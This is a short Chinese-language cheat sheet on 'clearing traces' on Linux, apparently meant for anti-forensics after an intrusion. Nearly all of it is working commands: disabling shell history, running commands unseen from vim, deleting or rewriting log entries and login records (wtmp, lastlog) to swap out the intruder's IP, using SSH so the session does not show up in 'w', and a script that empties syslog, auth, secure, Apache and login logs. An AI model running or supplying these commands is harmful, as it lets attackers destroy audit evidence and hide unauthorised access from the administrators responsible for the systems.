Linux清除痕迹
- 第一种方法:
在退出会话前直接执行:
#history -r
清除当前会话的命令历史记录
- 第二种方法:
在vim中执行自己不想让别人看到的命令
随便用vim打开一个文件
:set history=0
:!command
不同的系统
登录后执行下面命令,不记录历史命令(.bash_history)
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
删除部分日志,比如以当天日期或者自己的登录ip
sed -i '/当前时间/'d /var/log/messages
替换指定IP
Centos
utmpdump /var/log/wtmp |sed "s/8.8.8.8/1.1.1.1/g" |utmpdump -r >/tmp/wtmp1 &&mv /tmp/wtmp1 /var/log/wtmp
unix
/usr/lib/acct/fwtmp < /var/adm/wtmpx | sed "s/192.168.8.88/localhost/g" | /usr/lib/acct/fwtmp -ic > /var/adm/wtmpx
sed -i 's/192.168.1.1/8.8.8.8/' /var/log/lastlog
不记录ssh公钥在本地.ssh目录中
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i
登录账户 w下管理员是看不到的
ssh -T somebody@8.8.8.8 /bin/bash –i
日志文件
/var/log/message 系统启动后的信息和错误日志,是Red Hat Linux中最常用的日志之一
/var/log/secure 与安全相关的日志信息
/var/log/maillog 与邮件相关的日志信息
/var/log/cron 与定时任务相关的日志信息
/var/log/spooler 与UUCP和news设备相关的日志信息
/var/log/boot.log 守护进程启动和停止相关的日志消息
/var/log/btmp – 记录所有失败登录信息 命令:lastb
/var/log/auth.log 系统授权信息,包括用户登录和使用的权限机制等 (debian)
设定计划任务,执行脚本
#!/usr/bin/bash
#edit www.jbxue.com
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
history -c